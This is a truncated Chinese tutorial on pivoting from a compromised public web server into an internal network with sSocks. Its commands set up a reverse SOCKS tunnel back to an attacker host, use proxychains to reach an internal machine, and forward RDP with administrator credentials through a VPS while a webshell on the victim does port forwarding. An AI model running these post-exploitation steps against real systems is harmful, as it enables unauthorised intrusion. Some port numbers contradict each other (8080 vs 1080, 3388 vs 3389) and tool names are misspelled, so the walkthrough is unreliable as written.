用来开启socks代理服务,支持socks5验证,支持IPV6和UDP,并提供反向socks代理服务
即将远程计算机作为socks代理服务端,反弹回本地,极大方便内网的渗透测试。

现有一个环境,以获取位于公网的 Web服务器的shell,该 Web服务器是 Linux 系统。内网中存在另一台主机(Web服务器),现在要将公网 Web服务器设置为代理,访问和探测内网 Web服务器的信息。

  • 主机和公网的 Web服务器安装Ssockes。

Web服务器

  1. ./rssocks -vv -s 10.10.10.10:8889 # 接收10.10.10.10的8889端口流量

主机

配置 proxychins 代理链的配置文件, 改为 socks5 127.0.0.1 8080

./rcsocks -l 1080 -p 9999 -vv   #然后将本地的1080端口的流量转发到9999端口

接下来,我们想要访问和操作操作内网主机192.168.10.19的话,只需要在命令前面加上 proxychains
比如,获得内网Web服务器的网页文件: proxychains curl 192.168.10.19

ssocks转发的其他操作

第一步,用sSocks在VPS上建立3388与3389端口对应关系,实现流量互通:
root @ kali:〜#/ root / ssocks-0.0.14 / src / rcsocks -l 3389 -p 3389 -vv
第二步,从攻击端连接VPS的3388端口,建议用freerdp而非rdesktop,因为前者支持远程与本地连接等待,文本复制粘贴,挂载远程文件系统:
root @kali:〜#xfreerdp / u:administrator / p:admin / v:【你的ip】:3389
第三步,立即在大马上执行端口转发,可能需要连续多次点击开始:
注意,整个过程对步骤先后顺序敏感,VPS上rcsocks端口映射好以后就可以不管了,先在攻击端执行xfreerdp,让其会话保持,再在webshe